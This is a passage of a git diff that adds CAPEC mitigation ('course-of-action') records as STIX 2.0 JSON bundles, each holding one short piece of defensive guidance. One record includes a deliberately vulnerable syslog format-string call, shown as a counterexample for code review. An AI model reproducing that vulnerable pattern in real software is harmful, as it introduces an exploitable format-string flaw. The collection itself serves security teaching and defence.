@@ -0,0 +1,20 @@ +{ + "id": "bundle--f64c64c5-81e1-4f60-b223-afc636093389", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse Kerberos service account credentials across systems.", + "id": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json new file mode 100644 index 0000000000000000000000000000000000000000..3189cf19f5de2e3a9b14fc47115cb38fc7efadfe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--ffea77f9-92ac-457d-9ada-6125b0443cf0", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly restrict the location of the software being used.", + "id": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json new file mode 100644 index 0000000000000000000000000000000000000000..2fb223ff4995f85e3d729b51fd6a50712fcb50bd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--9d7803a5-4d1b-4e85-bd61-a34d763b3a04", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json new file mode 100644 index 0000000000000000000000000000000000000000..b3c0761e4fe28509bb1668c40160291cc32e787d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--f5e5452c-dd68-4933-a94f-d71377dcba47", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not rely on client validation or encoding for security purposes.", + "id": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e.json new file mode 100644 index 0000000000000000000000000000000000000000..145d3c36fda0ac67a1ff74aac18edb19a175340e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2f2de113-77fa-4290-8ed6-0b3bc10c3715", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Password protect documents and make them read-only for unauthorized users.", + "id": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json new file mode 100644 index 0000000000000000000000000000000000000000..093a1c325bdac77afe8ced6ae056bbb59c4dbe9f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a8cab130-ab46-4281-8447-6235e77314af", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05c9f402-bd10-4aba-84d1-3b6a25897c23.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05c9f402-bd10-4aba-84d1-3b6a25897c23.json new file mode 100644 index 0000000000000000000000000000000000000000..4a5ec8438db1361dbe2a5e41da3fa3f6d196e817 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05c9f402-bd10-4aba-84d1-3b6a25897c23.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--a7435ccd-6e8b-4be7-b58e-a29239e2d038", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Because Symlink can be modified by an attacker, make sure that the ones you read are located in protected directories.", + "id": "course-of-action--05c9f402-bd10-4aba-84d1-3b6a25897c23", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-45-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.6" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json new file mode 100644 index 0000000000000000000000000000000000000000..7b078cc204eeb9618c6a5ae9d649eead4ecbb8c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--36e06ba2-c055-4251-8699-46ed75c75ef9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure your firewall to block egress ICMP messages.", + "id": "course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-298-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json new file mode 100644 index 0000000000000000000000000000000000000000..6b339ec00d4a6d774f3793b1161fd4c91e1c944c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--8ab23eb4-0fec-4acd-9027-8a29ba6923dc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names", + "id": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a.json new file mode 100644 index 0000000000000000000000000000000000000000..16f99d8dbe5728a53f33b385afe770d67325de47 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--388f18b1-0d91-4ae7-910c-a51c2dc71983", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Change the default configuration for network devices to harden their security profiles. Default configurations are often enabled with insecure features to allow ease of installation and management. However, these configurations can be easily discovered and exploited by adversaries.", + "id": "course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json new file mode 100644 index 0000000000000000000000000000000000000000..72f369bb455d233277dca0f1c070f10600b9dab3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--9d07b0a3-8719-4975-9611-6c0f0b80b406", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Changes to registry entries in \"HKLM\\Software\\Microsoft\\Windows NT\\Winlogon\\Notify\" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.", + "id": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-579-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9.json new file mode 100644 index 0000000000000000000000000000000000000000..d146070a6290bf258e68bf1b9e54588e93443c2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--2ae6bc88-77fb-42b1-b4b4-65264ca3c037", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json new file mode 100644 index 0000000000000000000000000000000000000000..ea6857d7c8ddecfd0a86c55677fe7c5349dc499b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--fe4b8c05-1e3f-41d5-8f68-5432f9fbc6ff", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", + "id": "course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-67-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json new file mode 100644 index 0000000000000000000000000000000000000000..1345f03674a19bf6b1a3443107ec4e8639fb2727 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--09124e33-8604-4fff-b352-cee4aa66867c", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of all devices that contain secret key information. (even when devices are not in use)", + "id": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json new file mode 100644 index 0000000000000000000000000000000000000000..4d930b1145165f170b47c19fe641a112c0dab86e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--7034e67c-9ea4-46f8-b8cb-18dc2f66e2b6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", + "id": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab.json new file mode 100644 index 0000000000000000000000000000000000000000..92e253432dd4a01d522317ff5c608fe6f077eda3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--82bc6cdf-fd17-4166-a81d-2f2f96a9313a", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor processes and command-line arguments for unknown behavior related to code injection.", + "id": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json new file mode 100644 index 0000000000000000000000000000000000000000..a1f277ec1b3fa3298ab91a1388aa143b477c9970 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--b537cc66-3b03-4e92-bd8f-708e0ebb3e0c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.", + "id": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-493-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0881c782-318a-41ef-afff-13b773bc5926.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0881c782-318a-41ef-afff-13b773bc5926.json new file mode 100644 index 0000000000000000000000000000000000000000..193eb7c863efee1efa22907fc59ecf79c871db2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0881c782-318a-41ef-afff-13b773bc5926.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--a375fa9c-5552-499e-a556-64fc1df539ec", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain strong physical system access controls and monitor networks and physical facilities for insider threats.", + "id": "course-of-action--0881c782-318a-41ef-afff-13b773bc5926", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-524-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json new file mode 100644 index 0000000000000000000000000000000000000000..c51636ed20273c017d8d813d3c6d7e5b95670f6c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--187421f2-e707-4da2-bd85-3c2ef6b7e0dd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", + "id": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc.json new file mode 100644 index 0000000000000000000000000000000000000000..24d3a5735f5293ae49b74e724603678ccb28c289 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4d105224-5468-4d77-a89b-9997ee8aed97", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source packages from reputable package managers.", + "id": "course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json new file mode 100644 index 0000000000000000000000000000000000000000..879b5817d0f14a43a6b8f91c326dec2512d58cf7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--78cca3d4-d995-4f09-9e57-ffe48168940d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use synchronization to control the flow of execution.", + "id": "course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-26-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json new file mode 100644 index 0000000000000000000000000000000000000000..b4d2c954b58d5fb4693d4e55a399c2b54841413f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--eac634e9-30f5-43da-b64b-ecab213e8dcc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that all session tokens use a good source of randomness", + "id": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json new file mode 100644 index 0000000000000000000000000000000000000000..6178d133a59983b3898cc409d8f42ec0e461598f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d5ac5f7c-95ac-4efe-a90a-f0dd4ba0da04", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use browser technologies that do not allow client side scripting.", + "id": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json new file mode 100644 index 0000000000000000000000000000000000000000..d88aa3821d0582f539580987aa971344c10f5d05 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--a57e2b26-78bb-44c3-8c0e-38848714b8d7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", + "id": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json new file mode 100644 index 